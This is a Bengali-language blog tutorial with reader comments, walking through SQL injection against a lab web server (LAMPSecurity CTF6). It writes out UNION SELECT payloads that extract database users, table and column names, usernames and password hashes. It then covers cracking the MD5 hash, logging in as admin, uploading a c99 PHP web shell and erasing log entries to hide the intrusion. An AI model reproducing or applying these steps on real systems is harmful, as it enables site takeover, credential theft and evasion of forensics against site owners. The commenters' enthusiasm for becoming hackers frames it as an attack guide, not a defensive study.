!i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

39
812

আসসালামু আলাইকুম, সবাইকে আজকের টিউনে স্বাগতম কেমন আছেন সবাই? আশা করি সবাই ভাল আছেন আজ আপনাদের সামনে হাজির হয়েছি আরেকটি হ্যাকিংয়ের টিউন নিয়ে আমি হ্যাকিং পারি না তবুও একটু আধটু আপনাদের সাথে দেখি পারি কিনা শেয়ার করতে আজকের টিউনের নাম, “এডভান্সড SQL হ্যাকিং টিউটোরিয়াল”

আগেই বলে নিই যে, আমি এটি হ্যাকিং করি নি এই টিউটোরিয়ালটির Credits—-> Coded32, Mantra Security, LAMP Security, C99 shell Creator, Abhi_M, Limerick, Evil, Srchasst, BrandonMXB, DSG – Dragon Slayer Guy, N3t

Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

!i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

হ্যাকিং শুরু করার আগে আপনাকে কয়েকটা জিনিস আগেই নিতে হবে —–>

Mantra Security Toolkit=

লিনাক্সের জন্য ডাউনলোড লিংক (৩২ বিট) অথবা ডাউনলোড লিংক (৬৪ বিট)

উইন্ডোজের জন্য ডাউনলোড লিংক

এ্যাপলের জন্য ডাউনলোড লিংক

একটি vulnerable ওয়েব সাই্ট। আমি একটি মডিফাই ভার্সন ব্যবহার করেছি, সেটা হল LAMPSecurity CTF6

যে কোন PHP Shell যেটা আপনি পচন্দ করেন। যেমন- Google for “c99 shell” আমার মতে Team Nuts এর Devil shell এটাই ঠিক।

এবার কাজ শুরু হবে

আপনি আপনাদের একটি ওয়েব সাইট দিলাম। আপনারা যদি পান, তাহলে তো ভাল কখা।

http//192.168.132.128/

hacking tutorial !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

আমি ওয়েবসাইটটির প্রত্যেকটি পাতায় গেলাম ও নিচের URL টি দেয়ার সাথে সাথে একটা পৃষ্ঠা পেয়ে গেলাম।

http//192.168.132.128/?id=13

hacking tutorialImage mantrahackbar2.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

এবার F9 চেপে হ্যাকিংয়ের বারটি চালু করুন।

hacking tutorialImage mantrahackbar3.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

এবার আমি ওয়েব সাইটটির vulnerable পরীক্ষা করতে লাগলাম।

এবার লিংকটি সবার শেষে একটি ( ‘ ) দিলাম। যেমন-

http//192.168.132.128/?id=13’

hacking tutorialImage mantrahackbar4.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

এবার যেহেতু নতুন পাতাটি আগের পৃষ্ঠা থেকে ভিন্ন, তাই্ আমি নিশ্চিত হয়ে গেলাম যে এটা একটি vulnerable ওয়েবসাইট।

তাহলে এবার আপনি এখন বুঝেগেছে যে একটি vulnerable ওয়েবসাইট কেমন হতে পারে।

এবার নিচের লিংকটি লিখে এন্টার করুন।

http//192.168.132.128/?id=13 order by 1

hacking tutorialImage mantrahackbar6.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

আপনাকে শেষের সংখ্যাটি মনে রাখতে হবে। যাতে আপনি পরবর্তীতে পৃষ্ঠা পরিবর্তন করতে পারেন।

এবার এড্রেস বারে নিচের কোডটি টাইপ করে এন্টার করুন।

http//192.168.132.128/?id=13 order by 7

hacking tutorialImage mantrahackbar7.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

কোন পরিবর্তন ছাড়াই্ আমি ৭ এর চলে গেছি।

http//192.168.132.128/?id=13 order by 7

hacking tutorialImage mantrahackbar12.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

এবার আমরা Injection এর মাধ্যমে ৮ এ পরিবর্তন করবো। তাই্ আমরা ওয়েব সার্ভার হ্যাক করার পথ এখন খুঁজব। P

http//192.168.132.128/?id=13 order by 8

hacking tutorialImage mantrahackbar13.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

এবার সামনের দিকে এগিয়ে চলুন ও UNION statement তৈরি করুন। আমি শুধু SQL > UNION SELECT STATEMENT এখানে গিয়েছি।

hacking tutorialImage mantrahackbar14.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

এবার আমি টেবিলের সংখ্যা দিলাম। যেহেতু আমি ৮ পৃষ্ঠায় একটি ভিন্ন একটি পৃষ্ঠা পেয়েছিলাম, আমি নিশ্চিত যে, ৮ টাতে টেবিল ঠিক মতো নেই এবং সেখানে মাত্র ৭টি টেবিল আছে।

hacking tutorialImage mantrahackbar16.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

বাহ! আমি কিছু নাম্বার পেয়ে গেছি এই পাতায়। যেগুলো vulnerable columns. এখান থেকে ২ নিন।

http//192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7

hacking tutorialImage mantrahackbar19.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

এবার আমি নাম্বার ২ দিলাম লিংকটিতে ও আরেকটি SQL কমান্ড দিলাম। আমি এটা কার্যকর পেয়েছিলাম এবং এই পৃষ্ঠার ফলাফলও পেয়েছিলাম।

http//192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7

hacking tutorialImage mantrahackbar21.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

এটার বর্তমা ইউজার হল [email protected]

এবার আমরা এর database ভার্সন খুঁজে বের করব। এবার আমি ২ এর জায়গায় version() ব্যবহার করলাম।

http//192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7

hacking tutorialImage mantrahackbar22.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

এর ডাটাবেজ ভার্সন পেলাম 5.0.45

এবার আমার টেবিল তালিকা দেখুন।

http//192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables

hacking tutorialImage mantrahackbar23.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

আমি এই তালিকা থেকে “user” নামে একটি মজার টেবিল পেলাম। এবার আমি সকল কলামের তালিকা করলাম।

http//192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns

hacking tutorialImage mantrahackbar24.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

আমি “user” টেবিল থেকে কলাম চেয়েছিলাম কিন্তু দেখি কিছুই নাই।

http//192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name=’user’

hacking tutorialImage mantrahackbar25.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

এবার ইউজার নেম খুঁজে বের করব।

http//192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user

এবার পাসওয়ার্ড কি?

http//192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user

hacking tutorialImage mantrahackbar26.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

এটা দেখি এনক্রিপ্ট করা, এবার পাসওয়ার্ডকে Decrypting করলাম।

এবার আমি MD5 hash টি কপি করলাম। এবার হ্যাসটিকে hackbar এ পেষ্ট করলাম।

এবার এখানে গেলাম Encryption > MD5 Menu > send to > md5.rednoize.com

hacking tutorialImage mantrahackbar30.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

ওহো!!! আমি পাসওয়ার্ড পেয়ে গেলাম।

hacking tutorialImage mantrahackbar31.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

এবার লগইন পেজ খুঁজে বের করুন।

এটা আমার সামনেই আছে ঠিক, কিন্তু এটা আমার অন্যন্যা ক্ষেত্রেও আপনাকে এটা খুঁজে বের করতে হবে।

সবকিছু এখন ব্যাখ্যা দেয়া সম্ভব নয়, আপনি ভাল ভাবে একটু গবেষণা করুন যে, কিভাবে হ্যাকারা কাজ করে ও অনুসন্ধান করে।

hacking tutorialImage mantrahackbar32.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

আপনি একটু আগে যেটা পেয়েছেন, সেটা দিয়ে লগইন করুন।

সাবাস!!!!!! লগইন করে পেলেছে, আপনি এখন এই সাইটের এডমিন। হু হু হু হু হু হা হা হা হা হা হি হি হি হি হি

hacking tutorialImage mantrahackbar37.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

এবার আমি একটি আপলোড করে দিলাম।

hacking tutorialImage mantrahackbar38.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

এবার দেখুন এটি আপনাকে কোন শেল আপলোড করতে দেবে না।

hacking tutorialImage mantrahackbar39.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

এবার আমরা একটি “Add Event” বাটন যোগ করব।

hacking tutorialImage mantrahackbar40.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

সুন্দর!!! এটি আপলোড করতে দিচ্ছে।

hacking tutorialImage mantrahackbar41.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

আসুন যেখানে শেল আপলোড পেয়েছিলাম দেখুন

hacking tutorialImage mantrahackbar42.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

এখন আমরা ডিফল্ট আপলোড স্থান পেতে চেষ্টা করব।

hacking tutorialImage mantrahackbar43.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

 

hacking tutorialImage mantrahackbar44.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

এবার আমি দেখেন পেরেছি। এবার c9shell.php ফাইলটিতে ক্লিক করুন, যেটা আমি একটু আগে আপলোড করে ছিলাম।

বাহ আমি shell এ প্রবেশ করতে পেরেছি।

hacking tutorialImage mantrahackbar46.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

এবার আমি সবচেয়ে উপরের বাটনে ক্লিক করছি, যাতে root folder টি পেতে পারি।

hacking tutorialImage mantrahackbar48.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

এবার আপনি আপনার ইচ্ছা মতো যা ইচ্ছা তাই করতে পারবেন। আপনি ইচ্ছা করলে পুরা ওয়েবসাইটটি মুছে ফেলতে বা কোডিং পরিবর্তন বা যা ইচ্ছা তাই করতে পারবেন।

এবার log folder >>>log.log ক্লিক করুন ও এটা হল আমার SQL injection attacks এর মূল লগ ফাইল।

এবার এটিতে যান ও লগ ফাইলটি এডিট করুন।

hacking tutorialImage mantrahackbar52.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

 

এবার আমি আমার পুরা লগ এন্টিগুলো ডিলিট করে দিই। এবার এটি সেভ করুন। বাহ! লগ ফাইলটি খালি হু হু হু হু হা হা হা হা হি হি হি হি

hacking tutorialImage mantrahackbar56.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

এবার Self Remove এ ক্লিক করে c99 shell টি মুছে ফেলুন। সাবাস!!

Good Bye C99

hacking tutorialImage mantrahackbar60.jpg !i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

আমি আপনাদের আগেই বলেছি যে, আমি হ্যাকার না। তবুও আপনাদের কিছু শিখানোর জন্য মাঝে মাঝে হ্যাকিংয়ের উপর টিউটোরিয়াল লিখতে চেষ্টা করি। হয় না, তবুও চেষ্টা আর কি P সবাইকে অনেক অনেক ধন্যবাদ। ভাল থাকবেন, আল্লাহ হাফেজ…………

টিউনারপেজের নতুন টিউন আপনাকে ইমেইল করব?
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

39 মন্তব্য

  1. ফাটাফাটি ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

  2. হ্যাকিং দেখলে সবসময় আগ্রহ নিয়ে দেখি। যদিও ঐকাজে এখনো পা দিইনি এবং দেয়ার ইচ্ছাও নেই। তবে আগ্রহ আছে কিভাবে কাজটি হ্যাকাররা করে। পোস্টটিতে যথেষ্ট তথ্য এবং শেখার কৌশল রয়েছে। সবচেয়ে মজা লাগল ধারাবাহিক বর্ণনা পড়ে। খুব সুন্দর এবং গোছালো লেখা। দারুন!

  3. Viah, J Kono website a “shell” upload korar moto kono system na thakle. ki Vabe Upload korbo???? Plzz Viah system Bolla Valo Hoto…………………

  4. মনে হয় ধীরে ধীরে হ্যাকার হয়ে যাচ্ছি ! কি সর্বনাশ ! অনির্বাচিত ভাইরে তো গ্রেফতার করা দরকার বলেই মনে হচ্ছে ;)

  5. ভাই হ্যাকিং মনেহয় শিখিয়ে চারবেন । । ধন্যবাদ আরেকটু এগিয়ে গেলাম হ্যাকিং সঞ্চোদে । । অনেক অনেক ধন্যবাদ । । ।

  6. অনির্বাচিত টিউনার ভাই জটিল মারত্তক ও বিশাল তথ্যবহুল একটি টিউন। আমি হ্যাকার হওয়ার আর কিন্তু বেশী দিন নাই!!!

    • এই তো আপনি হ্যাকার হ্চছেন। সাবাস! সাবাস!! সাবাস!!! চালিয়ে যান। আপনার কাছে একটা অনুরোধ প্রথম দফায় আমার পিসি হ্যাকিং করবেন! :D :D :D :D :D :P :P :P :P

  7. বেশি বেশি পড়াশুনা করতে হবে

    আমার মাথায় ধুকেনা চেষ্টা করি কিছুই পারিনা

    • সব কিছু কি আপনি সাথে সাথেই পেরেছেন? না। আস্তে আস্তে করে শিখতে হবে। আর যে বই গুলো আপনাদের দেয়া হয়েছে, ওগুলো আস্তে আস্তে পড়তে থাকেন। পারবেনই, ইনশাআল্লাহ

      • অবসরে বই পড়ি আড্ডাও দেয়া হয়না, কেমন যেন ঘর কুনে হয়ে গেছি …………

  8. অনির্বাচিত টিউনার ভাই এইটা কি দেখাইলেন ? ভয় পাইছি ।খুব,খুব,খুবই সুন্দর হইছে । আচ্ছা বাকি টুকু তো আর বললেন না।অই সাইট টা কি এখন আপনার ? আপনি কি অইটা ব্যবহার করেন ?

    • আগেই বলে নিই যে, আমি এটি হ্যাকিং করি নি এই টিউটোরিয়ালটির Credits—-> Coded32, Mantra Security, LAMP Security, C99 shell Creator, Abhi_M, Limerick, Evil, Srchasst, BrandonMXB, DSG – Dragon Slayer Guy, N3t
      ২য় প্যারাতেই বলেছি, ধন্যবাদ…………………….. তবে টিউটোরিয়ালটি আমি লিখেছি

      • দুঃখিত আমি খেয়াল করি নাই । তবে টিউন তা কিন্তু আসলেই চরম হইছে ।আচ্ছা আপনারা মন্তব্যে স্মাইলি দেন কীভাবে ? আমি পারি না।

  9. হি হি হি আমিও হ্যাকিং এর জন্য প্রস্তুত, দোয়া করবেন কেমন???

  10. বিশাল তথ্যবহুল টিউন! আপনি অত্যন্ত সুন্দর ভাবে উপস্থাপনা করেন অনির্বাচিত টিউনার ভাই। তাই আপনার পোস্টগুলো আমার খুব ভাল লাগে।

মন্তব্য দিন আপনার